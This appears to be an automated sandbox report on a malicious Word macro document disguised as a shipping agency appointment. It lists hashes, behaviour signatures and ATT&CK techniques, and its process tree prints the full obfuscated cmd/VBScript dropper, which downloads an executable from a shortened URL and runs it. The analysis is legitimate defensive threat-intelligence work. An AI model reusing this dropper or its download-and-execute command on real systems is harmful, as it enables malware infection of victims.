7a5e7acc630e80be187a97fba6037caa36056c12e0f11299d6ee55bed6141fe6

General

Target

AGENCY APPOINTMENT MV APPOLLO MEO 30000MT OF STEEL BARS.docm
Size

14KB
MD5

a97a1ed3f0ae65d59ff8224543a7daea
SHA1

14e9cc3489b566173ed6e5a9dc0d1d0442066b60
SHA256

7a5e7acc630e80be187a97fba6037caa36056c12e0f11299d6ee55bed6141fe6
SHA512

08ff34debf744c1ad20ef758aaf74fc6ecb4c86ff6b3e3e4d2fde721054a67163750ab774e7ad4bc699dfcbe187a766140cd88b16992bb7979781ab3f09864e3

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

CMd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3232	4688	CMd.exe	WINWORD.EXE

Blocklisted process makes network request 4 IoCs

Processes:

WScript.exe

flow pid process

15 3096 WScript.exe
18 3096 WScript.exe
20 3096 WScript.exe
23 3096 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
15	3096	WScript.exe
18	3096	WScript.exe
20	3096	WScript.exe
23	3096	WScript.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1320 timeout.exe

pid	process
1320	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

CMd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings CMd.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4688 WINWORD.EXE
4688 WINWORD.EXE
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

4688 WINWORD.EXE
4688 WINWORD.EXE
4688 WINWORD.EXE
4688 WINWORD.EXE
4688 WINWORD.EXE
4688 WINWORD.EXE
4688 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	CMd.exe

pid	process
4688	WINWORD.EXE
4688	WINWORD.EXE

pid	process
4688	WINWORD.EXE
4688	WINWORD.EXE
4688	WINWORD.EXE
4688	WINWORD.EXE
4688	WINWORD.EXE
4688	WINWORD.EXE
4688	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WINWORD.EXECMd.exe

description	pid	process	target process
PID 4688 wrote to memory of 3232	4688	WINWORD.EXE	CMd.exe
PID 4688 wrote to memory of 3232	4688	WINWORD.EXE	CMd.exe
PID 3232 wrote to memory of 3096	3232	CMd.exe	WScript.exe
PID 3232 wrote to memory of 3096	3232	CMd.exe	WScript.exe
PID 3232 wrote to memory of 1320	3232	CMd.exe	timeout.exe
PID 3232 wrote to memory of 1320	3232	CMd.exe	timeout.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGENCY APPOINTMENT MV APPOLLO MEO 30000MT OF STEEL BARS.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4688
- C:\Windows\SYSTEM32\CMd.exe
  CMd /c cd %TEMP% & @ECHO L0n= "https://bit.ly/2N6DBnf">>G6m.VBS &@ECHO V6f = L7x("ONb]7NaN")>>G6m.VBS &@ECHO Set Q7n = CreateObject(L7x("V\aVU;7aVUQ]]Y"))>>G6m.VBS &@ECHO Q7n.Open L7x("PN]"), L0n, False>>G6m.VBS &@ECHO Q7n.send ("")>>G6m.VBS &@ECHO Set R8s = CreateObject(L7x("JMXMK7\][NJV"))>>G6m.VBS &@ECHO R8s.Open>>G6m.VBS &@ECHO R8s.Type = 1 >>G6m.VBS &@eCHo R8s.Write Q7n.ResponseBody>>G6m.VBS &@ECHO R8s.Position = 0 >>G6m.VBS &@ECHO R8s.SaveToFile V6f, 2 >>G6m.VBS &@ECHO R8s.Close>>G6m.VBS &@ECHO function L7x(X8d) >> G6m.VBS &@ECHO For Q3w = 1 To Len(X8d) >>G6m.VBS &@ECHO U6w = Mid(X8d, Q3w, 1) >>G6m.VBS &@ECHO U6w = Chr(Asc(U6w)- 9) >>G6m.VBS &@ECHO W4j = W4j + U6w >> G6m.VBS &@ECHO Next >>G6m.VBS &@ECHO L7x = W4j >>G6m.VBS &@ECHO End Function >>G6m.VBS & G6m.VBS &dEl G6m.VBS & tIMeOUT 13 & FEYT.EXE
  2⤵
  - Process spawned unexpected child process
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\G6m.VBS"
    3⤵
    - Blocklisted process makes network request
    PID:3096
- - C:\Windows\system32\timeout.exe
    tIMeOUT 13
    3⤵
    - Delays execution with timeout.exe
    PID:1320

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FEYT.EXE

MD5
02ded868abf8cad83f1680d4441e5935

SHA1
097f07f148a59b28974c4dfd7e102498ef561497

SHA256
dce17483a8148100e36bc93dec31846f641381d0c1d3a64ca7f6a25f1a67889a

SHA512
12ad7a390fd6515a744b6ff74212d525c69f918001cba99556c111fe0aca0027cab702c6222b6ff2cfeaf5cbae224503646dbed5367ef0dbf8eaf2d218a20be4

Download Submit
C:\Users\Admin\AppData\Local\Temp\G6m.VBS

MD5
0e90c3f175db18c36c0fafc4da99a74c

SHA1
c3a6c670b35af7fe89ab0332b81005a360afe98f

SHA256
cf43c585f5ec1cdf81610890bb1efb87c3dac00bb37ac370a8549e585fea94e3

SHA512
36d9054192b1b9573c1177b67b79c4bdc565f65f6fd155b4cbc31b1988a119ab444991562aa32924c15b11b2b4b1604a1f9287d4ea25978cf9a8d02bfe44e0d7

Download Submit
memory/1320-10-0x0000000000000000-mapping.dmp

Download
memory/3096-8-0x0000000000000000-mapping.dmp

Download
memory/3232-7-0x0000000000000000-mapping.dmp

Download
memory/4688-2-0x00007FFCCE2C0000-0x00007FFCCE2D0000-memory.dmp

Filesize
64KB

Download
memory/4688-3-0x00007FFCCE2C0000-0x00007FFCCE2D0000-memory.dmp

Filesize
64KB

Download
memory/4688-4-0x00007FFCCE2C0000-0x00007FFCCE2D0000-memory.dmp

Filesize
64KB

Download
memory/4688-5-0x00007FFCCE2C0000-0x00007FFCCE2D0000-memory.dmp

Filesize
64KB

Download
memory/4688-6-0x00007FFCEDB20000-0x00007FFCEE157000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads